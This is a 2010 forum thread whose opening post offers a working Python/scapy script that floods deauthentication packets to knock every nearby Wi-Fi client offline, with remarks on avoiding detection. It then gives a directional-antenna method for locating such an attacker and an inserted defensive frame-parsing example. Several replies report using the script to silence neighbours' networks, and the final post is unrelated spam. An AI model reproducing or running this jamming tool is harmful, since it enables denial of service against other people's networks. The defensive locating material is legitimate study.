begood Posted May 20, 2010

How to burn down any wireless network around you and how to find out the exact location of a wireless laptop

I made a program which monitors the air for connections between wireless hot spots and hosts; if the program finds a connection, it sends a deauth packet which disconnects the client. This goes at such a high speed that clients have no chance to establish a proper connection to the router.

    #!/usr/bin/python
    try:
        import sys,os
        from scapy.all import *
    except:
        print "[-] Could not import all needed things, be sure you have Python, aircrack-ng and scapy installed"
        sys.exit(0)

    def deauth_flood(p):
        if p.haslayer(Dot11):
            mac = {}
            mac["ap"]=p.sprintf("%Dot11.addr1%")
            mac["station1"]=p.sprintf("%Dot11.addr2%")
            if not mac["ap"]=="ff:ff:ff:ff:ff:ff" and mac["station1"]!="None":
                os.system("aireplay-ng -0 1 -a "+mac["ap"]+" -c "+mac["station1"]+" "+sys.argv[1]+" &")
                # Remove " &" for a slower attack rate.

    def instructions():
        print "== WLAN blackout - written by Jelmer de Hen - published at http://h.ackack.net ==\n\ninstructions:\n"
        print "python "+sys.argv[0]+" [iface]"
        print "python "+sys.argv[0]+" mon0"

    if len(sys.argv)>1:
        print "[+] Searching for packets..."
        sys.exit(sniff(iface=sys.argv[1],prn=deauth_flood))
    else:
        sys.exit(instructions())

Use at your own risk. You won't be detected too fast since you send entirely spoofed packets, but with the right equipment and skills on the victim's side he will be able to do it. Normally, when these kinds of attacks are launched at companies, they will have to ask the ISP to come with a special device which will track down the exact location of the device. But what if you are being targeted by this attack?

First you have to know that this might be hard to detect since it can be exploited from very custom locations, think about:
- Attacker is at 1 location not too far away; for example in a car
- Moving attacker walking around with a laptop in a bag
- Infected/botted computer(s) of any kind, could even be your heat pump or light system control system in this case
- Malicious pineapples
- Phones (like the iPhone)
- Satellite dish pointed at you
- Infected satellite

Understand that it is impossible to counter some of these attacks, but an iPhone or car should be traceable.

Requirements:
- Movable Linux based PC with wireless capability; if you don't have a *nix system you can download BackTrack for free, burn it to a DVD and boot from it; in case your PC can't boot DVDs you can go for an Ubuntu live CD or another distribution. Booting from these CDs won't change anything on your actual system.
- Wireshark (free)
- Aircrack-ng (free)

Optional:
- pointable antenna
- thin foil
- scissors
- glue
- cardboard (or other hard bendable material)

Why thin foil, scissors and cardboard? To locate the attacker; it would be ideal to have a parabolic reflector to decrease the time it will take to localize the attacker.
You can make the windsurfer or be creative and make something custom. The idea is that you can eliminate 1 side of the antenna and reflect that to the side where you point it, to increase your range and eliminate the chance of the attacker being behind the antenna.

When you have all requirements you can get started: move into the middle of the deauth packet storm and turn on Wireshark & airodump-ng.
In Wireshark apply “radiotap.length==13” as filter (captures all deauth packets) and make a list of all hosts you see in airodump-ng.
Look at the rate at which you capture deauth packets and look in the bottom fields for the connections between routers and hosts; look at the PWR levels here.
Now move the windsurfer 90 degrees and look at the rate at which you capture the deauth packets now, and decide if it was less or more. Repeat this process until you find the direction in which the deauth packets have the highest rate. When you are in a building it would be smart to also look under and above you.
Once you have localized the direction where most deauth packets came from, move your PC closer to that source, then redo the process of monitoring where the packets come from and look at aircrack-ng.
Once you are very, very close you can determine which MAC address is doing this by looking it up in airodump-ng; this machine at that moment will have a very low PWR (0 to -50 is good enough).
Now run this command in bash to determine the manufacturer of the card so you know something more about the attacking machine.

    cat `locate manuf` | grep 00:11:22

Replace the last part with the first part of the MAC address; for example, when you found the MAC address 55:44:33:22:11:00, then 55:44:33 is the part you will need.
Please note that this MAC address can be spoofed and/or not broadcasting, so you won't be able to see it; then you have to do it all with Wireshark and determine where the most packets come from.
After you did all this you can just grab that malicious pineapple and smash it as hard as you can.

This cheap attack vector can form a high risk level during war. When properly exploited, an army can attack an entire city by pointing a satellite dish in their direction, or think about an attacker who takes over a satellite and reprograms it to be able to do these kinds of attacks. With these techniques it will be hard to prevent those attacks unless we make big thin foil shields around our cities.
I gave you some basic solutions to find the attacker, but this antenna detection way also works great for other means. I once tried this on a friend of mine in my old school to find out his location; it was a multi-floor school building and I had no idea where he was. Within 15 minutes I found him.

// who's testing it?
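The bearing survey described in the post above, from the defender's side, as an added example (not code from the original post or its author): it recognizes deauthentication frames by their 802.11 frame-control type and subtype instead of by radiotap header length, then compares the deauth rate per antenna bearing and tallies which BSSIDs are being targeted. The function names, the 10 frames/s flood threshold, the 10-second dwell and the sample frames are assumptions constructed for illustration.

```python
import struct
from collections import Counter

def parse_deauth(raw):
    """Return (receiver, transmitter, bssid, reason) if raw is a deauth frame, else None."""
    if len(raw) < 4:
        return None
    rt_len = struct.unpack_from("<H", raw, 2)[0]   # radiotap length field, little-endian
    dot11 = raw[rt_len:]
    if len(dot11) < 26:                            # 24-byte MAC header + 2-byte reason code
        return None
    fc = dot11[0]
    if (fc >> 2) & 0x3 != 0 or fc >> 4 != 12:      # management type 0, subtype 12 = deauth
        return None
    mac = lambda b: ":".join("%02x" % x for x in b)
    reason = struct.unpack_from("<H", dot11, 24)[0]
    return mac(dot11[4:10]), mac(dot11[10:16]), mac(dot11[16:22]), reason

def survey(samples, dwell_seconds):
    """samples: (bearing_degrees, raw_frame) pairs captured dwell_seconds per bearing.
    Returns ({bearing: deauth frames per second}, Counter of targeted BSSIDs)."""
    counts, targets = {}, Counter()
    for bearing, raw in samples:
        counts.setdefault(bearing, 0)              # bearings with no deauths still get a rate
        hit = parse_deauth(raw)
        if hit:
            counts[bearing] += 1
            targets[hit[2]] += 1                   # source MACs are spoofable, so tally BSSIDs
    return {b: n / dwell_seconds for b, n in counts.items()}, targets

def strongest_bearing(rates, flood_rate=10.0):
    """Bearing with the highest deauth rate, or None if nothing reaches flood_rate."""
    bearing = max(rates, key=rates.get, default=None)
    return bearing if bearing is not None and rates[bearing] >= flood_rate else None

def make_frame(subtype, dst, src, bssid):
    """Constructed test frame: minimal 8-byte radiotap header + management frame."""
    radiotap = struct.pack("<BBHI", 0, 0, 8, 0)
    header = bytes([subtype << 4, 0]) + b"\x00\x00" + dst + src + bssid + b"\x00\x00"
    return radiotap + header + struct.pack("<H", 7)   # reason code 7 as sample body

# Constructed capture: 10 s dwell per bearing, beacons (subtype 8) mixed with deauths.
AP, STA = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
SAMPLES = [(b, make_frame(12, STA, AP, AP)) for b, n in
           [(0, 30), (90, 120), (180, 40), (270, 5)] for _ in range(n)]
SAMPLES += [(b, make_frame(8, b"\xff" * 6, AP, AP)) for b in (0, 90, 180, 270) for _ in range(20)]
if __name__ == "__main__":
    rates, targets = survey(SAMPLES, dwell_seconds=10)
    print(rates, targets.most_common(1), strongest_bearing(rates))
```

On a real capture the (bearing, frame) pairs would come from a monitor-mode pcap recorded while the antenna is held at each bearing for the same dwell time.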
Fitty Posted May 21, 2010
I have about 10 Wi-Fi networks here, wait till I get back from school.

begood Posted May 21, 2010 Author
> I have about 10 Wi-Fi networks here, wait till I get back from school.
Can't wait. I don't have access or time for this right now.

Guest Nemessis Posted May 21, 2010
Don't forget to tell us if it worked for you, Fitty.

adonisslanic Posted May 23, 2010
I'm also going to start taking down my Wi-Fi in the attic (seriously).

adonisslanic Posted May 23, 2010
Yep, it works, I found out it's in the attic and it found the exact location... it's boring at first because you have to sit and compare the number of packets, but the closer you get, the more kewl it is. rep+ begood <()>

Fitty Posted May 23, 2010
A classmate tried it and supposedly nothing. Trilulilu was blasting at his neighbor's... So he was able to connect without problems.

adonisslanic Posted May 25, 2010
Maybe it doesn't work on some Wi-Fi networks. I tried to find my own router in the attic and it worked... I searched by comparing the number of packets received...

pyth0n3 Posted May 25, 2010
Well, of course it has to work, because it carries out a Deauthentication-type attack, which basically kicks out anyone who is connected; in this script the attack is repeated, a kind of flood.
A frame is sent to the broadcast address which drops anyone who is connected. It makes the users believe they are being kicked out by the network's AP.
There is also essid_jack, for which you have to specify the BSSID address and the network's channel.
By default it sends the packet to the broadcast address (the advantage is that it will kick everyone out).
Using the -d option you can specify a particular MAC.
essid_jack is part of Airjack and can be found here.
It is a DoS-type attack.

zYztem Posted June 18, 2010
I tried it too earlier, successfully. I managed to take down 3 in one shot. The upstairs neighbor listens to internet radio nonstop; it went quiet.

interes91ant Posted June 20, 2010
I tested it too and it works. pax, what price are you selling them for and what specs do they have?

khushi11 Posted October 12, 2018
This error occurs when some of the functions are not connected or not enabled, but you can now learn how to turn on Bluetooth on Windows 10 from here. I am sure it will be helpful for you.